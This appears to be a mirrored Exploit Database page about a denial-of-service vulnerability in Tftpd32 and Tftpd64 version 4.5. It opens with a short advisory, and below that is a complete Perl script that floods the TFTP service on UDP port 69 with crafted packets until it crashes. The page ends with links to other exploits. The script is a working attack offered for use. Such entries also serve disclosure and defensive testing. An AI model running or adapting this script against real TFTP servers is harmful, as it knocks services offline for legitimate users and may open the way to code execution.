TFTPD32 / Tftpd64 – Denial of Service

Exploit Database
13 阅读

作者： j0s3h4x0r

日期： 2014-05-14
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/39331/

source: https://www.securityfocus.com/bid/67404/info

Tftpd32 and Tftpd64 are prone to denial-of-service vulnerabilities.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, code-execution may be possible; however this has not been confirmed.

The following products are vulnerable:

Tftpd32 4.5
Tftpd64 4.5

#!/usr/bin/perl -w
 
use IO::Socket;
 
for (my $j = 0; $j < 2; $j++)
{
sleep(2);
for (my $i = 0; $i < 1500; $i++)
{
$st_socket = IO::Socket::INET->new(Proto=>'udp', 
PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
 
$p_c_buffer = "\x0c\x0d" x 10;
 
print $st_socket $p_c_buffer;
 
close($st_socket);
 
print "sent " . $i . "\n";
}
}
 
exit;

last Exploits
TFTPD32 / Tftpd64 – Denial of Service的更多信息

Opera Web Browser 11.11 – Denial of Service：
Cisco Webex Player T29.10 – ‘.WRF’ Use-After-Free Memory Corruption：
Adobe Flash AS2 – DisplacementMapFilter.mapBitmap Use-After-Free (1)：
libxml2 – xmlParseEndTag2 Heap Buffer Overread：
Samsung iPOLiS 1.12.2 – iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)：
HP Data Protector Media Operations – Null Pointer Dereference Remote Denial of Service：
Astium VoIP PBX 2.1 build 25399 – Remote Crash (PoC)：
Mozilla Firefox 8.0 – Null Pointer Dereference (PoC)：